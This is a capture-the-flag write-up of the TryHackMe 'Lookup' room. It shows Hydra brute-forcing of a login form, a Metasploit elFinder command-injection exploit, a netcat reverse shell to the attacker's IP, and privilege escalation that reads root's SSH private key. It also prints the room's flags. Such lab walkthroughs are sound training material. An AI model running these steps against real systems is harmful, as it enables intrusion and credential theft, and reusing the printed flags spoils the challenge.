Post

Tryhackme: Lookup

Posted Updated
By Aakash Modi
1 min read
Tryhackme: Lookup

Tryhackme: Lookup | Writeup | 13 July 2025

TryHackMe Logo Overpass_image

Author: Aakash Modi

πŸ›°οΈ Reconnaissance & Scanning

πŸ” Host Discovery

First, add the target host’s IP to /etc/hosts as lookup.thm:

1
2
3

sudo nano /etc/hosts
# Add the following line:
<IP_address>   lookup.thm

Hosts File

πŸ”Ž Nmap Scan / Port Scanning

Run a full port scan with service and version detection:

1

sudo nmap -T4 -n -sC -sV -Pn -p- -oN fastscan.txt lookup.thm

Nmap Scan Screenshot

πŸ•΅οΈ Nikto Scan

Scan for web vulnerabilities:

1

nikto -h http://lookup.thm/ -o nikto_scan.txt

Nikto Scan

🧰 Burp Suite Enumeration

Use Burp Suite Intruder to enumerate usernames:

Burp Intruder

  • Found valid username: Username Correct
  • Testing other usernames: Wrong Username/Password

πŸ”“ Hydra Brute Force

Find Usernames

1

hydra -L /usr/share/wordlists/rockyou.txt -p admin lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=wrong username or password" -V

Finding Username

  • Discovered users:
    1. admin
    2. jose

Found Username

Find Password

1

hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=wrong password" -V

Finding Password

  • Found credentials:
    username: jose
    password: password123

πŸšͺ Exploitation

  • Login to dashboard: Dashboard Access
  • Found SSH credentials: SSH Credentials

Search for Exploits

1

searchsploit elfinder

Find Exploit

Metasploit Exploitation

1
2
3
4

use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
set RHOSTS files.lookup.thm
set LHOST <your_ip>
exploit

Metasploit Exploit

  • Get a shell:
    1
2

    shell
busybox nc <your_ip> 1111 -e bash
  • Stabilize shell:
    1
2
3

    python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
cd /tmp

Tmp Directory

πŸš€ Privilege Escalation

  • Find SUID binaries:
    1

    find / -perm -4000 -type f 2>/dev/null

    Finding Vulnerabilities

  • Update PATH:
    1

    export PATH=/tmp:$PATH

  • Use password list and brute-force with suBF.sh:

    1
2

    chmod +x suBF.sh
./suBF.sh -u think -w password.txt

    Think Password

  • Check sudo permissions:
    1

    sudo -l

    Sudo List

  • Use look command for privilege escalation (GTFOBins):
    1

    sudo look "" user.txt
    • User flag: 38375fb4dd8baa2b2039ac03d92b820e Look Command
  • Extract root SSH key:
    1

    sudo look "" /root/.ssh/id_rsa

    SSH Key

  • Copy SSH key to your machine:
    1
2

    nano id_rsa
chmod 600 id_rsa

    SSH Key on Machine

  • SSH as root:
    1

    ssh -i id_rsa root@files.lookup.thm

    Root Access

  • Root flag: 5a285a9f257e45c68bb6c9f9f57d18e8 Root Flag

πŸ› οΈ Tools Used

  • Nmap
  • Nikto
  • Hydra
  • Burp Suite
  • Netcat (nc)
  • Searchsploit
  • Metasploit

🎯 Conclusion

  • All tasks completed successfully!
Room Completed

πŸŽ‰ Happy Hacking!

Tryhackme
hacking tryhackme namp smbclient brupsuite Nikto brute-force ftp ssh relate
This post is licensed under CC BY 4.0 by the author.